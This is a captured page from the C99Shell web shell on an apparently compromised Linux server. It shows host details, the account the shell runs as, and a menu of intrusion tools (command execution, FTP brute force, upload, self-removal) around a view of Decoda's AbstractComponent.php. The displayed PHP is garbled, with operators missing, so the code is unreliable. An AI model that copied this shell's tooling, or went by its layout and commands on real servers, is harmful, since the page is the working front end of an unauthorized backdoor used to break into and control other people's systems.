!C99Shell v. 2.1 [PHP 8 Update] [02.02.2022]!

Software: Apache/2.4.53 (Unix) OpenSSL/1.1.1o PHP/7.4.29 mod_perl/2.0.12 Perl/v5.34.1. PHP/7.4.29 

uname -a: Linux vps-2738122-x 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64 

uid=1(daemon) gid=1(daemon) grupos=1(daemon) 

Safe-mode: OFF (not secure)

/opt/apex_led/php/vendor/mjohnson/decoda/src/Decoda/Component/   drwxrwxr-x
Free 15.64 GB of 61.93 GB (25.25%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     AbstractComponent.php (1.99 KB)      -rwxrwxr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
/**
 * @copyright   2006-2014, Miles Johnson - http://milesj.me
 * @license     https://github.com/milesj/decoda/blob/master/license.md
 * @link        http://milesj.me/code/php/decoda
 */

namespace Decoda\Component;

use 
Decoda\Decoda;
use 
Decoda\Component;
use 
Decoda\Loader;

/**
 * Provides default shared functionality for Filters, Hooks and Engines.
 */
abstract class AbstractComponent implements Component {

    
/**
     * Configuration.
     *
     * @type array
     */
    
protected $_config = array();

    
/**
     * List of Loaders.
     *
     * @type \Decoda\Loader[]
     */
    
protected $_loaders = array();

    
/**
     * Decoda object.
     *
     * @type \Decoda\Decoda
     */
    
protected $_parser;

    
/**
     * Apply configuration.
     *
     * @param array $config
     */
    
public function __construct(array $config = array()) {
        
$this->setConfig($config);
        
$this->construct();
    }

    
/**
     * {@inheritdoc}
     */
    
public function addLoader(Loader $loader) {
        
$this->_loaders[] = $loader;

        return 
$this;
    }

    
/**
     * {@inheritdoc}
     */
    
public function construct() {
        return;
    }

    
/**
     * {@inheritdoc}
     */
    
public function getConfig($key) {
        return isset(
$this->_config[$key]) ? $this->_config[$key] : null;
    }

    
/**
     * {@inheritdoc}
     */
    
public function getLoaders() {
        return 
$this->_loaders;
    }

    
/**
     * {@inheritdoc}
     */
    
public function getParser() {
        return 
$this->_parser;
    }

    
/**
     * {@inheritdoc}
     */
    
public function message($key, array $vars = array()) {
        return 
$this->getParser()->message($key$vars);
    }

    
/**
     * {@inheritdoc}
     */
    
public function setConfig(array $config) {
        
$this->_config $config $this->_config;

        return 
$this;
    }

    
/**
     * {@inheritdoc}
     */
    
public function setParser(Decoda $parser) {
        
$this->_parser $parser;

        return 
$this;
    }

}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.1 [PHP 8 Update] [02.02.2022] maintained byC99Shell Github | Generation time: 0.3713 ]--